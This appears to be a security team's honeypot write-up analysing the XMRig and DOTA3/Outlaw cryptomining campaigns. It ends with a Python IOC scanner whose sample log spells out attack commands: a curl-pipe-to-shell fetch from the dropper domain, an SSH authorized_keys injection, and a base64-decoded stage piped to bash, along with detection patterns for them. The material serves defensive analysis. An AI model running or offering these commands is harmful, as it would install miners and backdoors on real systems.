Attackers are stealing your CPU
As SOC analysts, we've seen the usual noise: SSH brute-force attempts, bot scans, "forgotten" webshells hidden in /tmp
or, worse, in wp-content/uploads. But sometimes the damage is not ransomware, data theft or destruction of any kind.
Sometimes, attackers just want your CPU cycles.
In this write-up, we are looking into two cryptocurrency mining campaigns recovered from our honeypots - XMRig and DOTA3/Outlaw. We'll walk you through how both miners were delivered and what artifacts were left behind.
XMRig
Our honeypot infrastructure is based on Cowrie, an SSH honeypot, so the attack started with a brute-force attempt. After "guessing" the correct password, the attacker gained root access on the system and started dropping threat intel for us.
The attacker downloaded scripts from an external domain: hxxp[://]badintmine[.]onrender[.]com/setup[.]sh.
Investigating the domain on Lookyloo reveals that there are two setup scripts: one for Linux machines and the other for Windows.
Digging even further, we submitted the setup.sh script to Pandora to analyze its contents and to confirm whether it is malicious:
Analyzing the script itself, we can see that it downloads a new artefact from hxxp[://]badintmine[.]onrender[.]com/xmrig, which is the actual cryptocurrency mining binary. The script then establishes persistence by creating a systemd service named badint, ensuring the miner automatically relaunches after a reboot. Additionally, the attacker's wallet address is set and the system is connected to a remote mining pool, pool[.]hashvault[.]pro:443.
The second script, setup.bat, is the Windows counterpart and it follows the same logic for Windows-based systems:
Pandora automatically extracts observables or potential IOCs to continue the investigation or to ingest it as threat intelligence:
A further Google search on the observables from the script reveals that HashVault is a cryptocurrency mining pool commonly associated with Monero mining operations, while XMRig itself is legitimate open-source mining software frequently abused in cryptojacking campaigns.
This sample of xmrig is flagged as malicious by both Pandora and VirusTotal:
DOTA3/Outlaw
First, the attacker injects an SSH key into .ssh/authorized_keys, allowing passwordless remote access for future logins. A specific indicator within the key itself is the comment mdrfckr, a signature pointing to the Outlaw/Dota cryptomining campaign.
Querying our OpenSearch instances shows both the mdrfckr indicator and its associated SSH key appearing repeatedly from many IP addresses. In total, the attacker attempted to authenticate and establish persistence on the honeypot infrastructure more than 150 times.
The next commands are basic reconnaissance, killing other competing miners or services, and changing the root password to a random string.
The attacker executes a payload encoded in base64, likely as a simple obfuscation mechanism. After decoding the payload using CyberChef, the script revealed functionality associated with the dota3 malware:
The decoded commands suggest an attempt to move laterally to new machines by scanning 192.168.0.0/16 and 172.16.0.0/16.
/tmp/up.txt is a file containing <username>:<password> pairs used to brute-force other machines in these subnets.
Unfortunately, this is just an assumption because the attacker did not manage to drop dota3 or kthreadadd before ending the session.
Nevertheless, the IOCs gathered strongly align with previously documented behavior associated with the Outlaw/DOTA cryptomining botnet.
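As an added example (not part of the original investigation or of any of the tools named here), the following Python script flags the indicators from both campaigns, the XMRig dropper domain and pool and the Outlaw SSH-key comment and dota3 stage, in Cowrie-style JSON command logs, decoding the base64-wrapped stage before matching. The log events are constructed and only assume the cowrie.command.input event shape.

```python
import base64
import json
import re

# Indicators drawn from the write-up; the defanged domain is re-armed so it matches real log text.
IOC_PATTERNS = {
    "xmrig_dropper": re.compile(r"badintmine\.onrender\.com|/xmrig\b|hashvault\.pro", re.I),
    "outlaw_ssh_key": re.compile(r"\bmdrfckr\b"),
    "outlaw_dota3": re.compile(r"\bdota3\b|\bkthreadadd\b|/tmp/up\.txt|192\.168\.0\.0/16|172\.16\.0\.0/16"),
}
# 'echo <b64> | base64 -d' stage, the obfuscation seen in the Outlaw session.
B64_STAGE = re.compile(r"echo\s+['\"]?([A-Za-z0-9+/=]{16,})['\"]?\s*\|\s*base64\s+(?:-d|--decode)")


def expand_base64(cmd: str) -> str:
    """Append the decoded form of every base64 stage so indicators hidden in it are matched too."""
    for m in B64_STAGE.finditer(cmd):
        try:
            cmd += "\n" + base64.b64decode(m.group(1)).decode("utf-8", "replace")
        except ValueError:  # binascii.Error subclasses ValueError: skip echoes that are not base64
            pass
    return cmd


def scan_cowrie_log(lines):
    """Return (session, src_ip, [indicator names]) for each command event hitting an IOC."""
    hits = []
    for line in lines:
        event = json.loads(line)
        if event.get("eventid") != "cowrie.command.input":
            continue  # connect/login/close events carry no command text
        text = expand_base64(event.get("input", ""))
        names = [n for n, p in IOC_PATTERNS.items() if p.search(text)]
        if names:
            hits.append((event["session"], event["src_ip"], names))
    return hits


# Constructed sample events mirroring the cowrie.json shape (an assumption); IPs are documentation ranges.
PAYLOAD_B64 = base64.b64encode(b"cd /tmp && ./dota3 192.168.0.0/16 172.16.0.0/16 /tmp/up.txt").decode()
SAMPLE_LOG = [
    json.dumps({"eventid": "cowrie.session.connect", "session": "a1", "src_ip": "203.0.113.5"}),
    json.dumps({"eventid": "cowrie.command.input", "session": "a1", "src_ip": "203.0.113.5",
                "input": "curl -s http://badintmine.onrender.com/setup.sh | sh"}),
    json.dumps({"eventid": "cowrie.command.input", "session": "b2", "src_ip": "198.51.100.7",
                "input": "echo 'ssh-rsa AAAA<placeholder> mdrfckr' >> ~/.ssh/authorized_keys"}),
    json.dumps({"eventid": "cowrie.command.input", "session": "b2", "src_ip": "198.51.100.7",
                "input": f"echo {PAYLOAD_B64} | base64 -d | bash"}),
    json.dumps({"eventid": "cowrie.command.input", "session": "c3", "src_ip": "192.0.2.9", "input": "uname -a; nproc"}),
]
```

Running `scan_cowrie_log(SAMPLE_LOG)` yields one hit for the XMRig session and two for the Outlaw session, while the plain reconnaissance session produces none.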
Tools used
Throughout the investigation, we've used the following open-source tools or platforms to safely analyze the payloads:
Conclusions
Looking into these two cryptomining campaigns, we've seen how they rely on simple techniques to compromise and monetize exposed systems. Both the XMRig and Dota/Outlaw activity chains leveraged brute-forced SSH access, lightweight persistence mechanisms, and legitimate tools to quietly hijack computational resources for cryptocurrency mining. While the XMRig campaign focused on deploying the scripts and starting to mine, the Dota/Outlaw counterpart showed more advanced behavior by attempting lateral movement across the internal subnets.
SOCcare
The SOCcare project is co-funded by the European Union, alongside our collaborators, NRD Cyber Security and RevelSI, and supported by the European Cybersecurity Competence Centre (ECCC) under Grant Agreement No. 101145843. Views and opinions expressed are however those of the author(s) only and do not necessarily reflect those of the European Union or the European Cybersecurity Competence Centre. Neither the European Union nor the European Cybersecurity Competence Centre can be held responsible for them.
